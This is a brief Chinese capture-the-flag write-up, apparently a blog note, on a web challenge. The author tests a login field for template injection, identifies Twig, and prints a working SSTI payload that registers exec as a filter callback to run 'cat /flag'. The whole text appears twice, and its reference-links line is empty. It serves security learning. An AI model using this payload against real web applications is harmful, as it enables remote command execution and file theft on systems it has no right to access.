打开就是一个登录id,随便打个admin看看,根据题目提示,再翻翻cookie。打几个单引号和{{7*7}}看看有没有报错或者是ssti。
发现有ssti,于是按照流程确认模版类型。
得到是Twig模版,然后开始找wp(bushi)。
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
学习文章:
打开就是一个登录id,随便打个admin看看,根据题目提示,再翻翻cookie。打几个单引号和{{7*7}}看看有没有报错或者是ssti。
发现有ssti,于是按照流程确认模版类型。
得到是Twig模版,然后开始找wp(bushi)。
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
学习文章: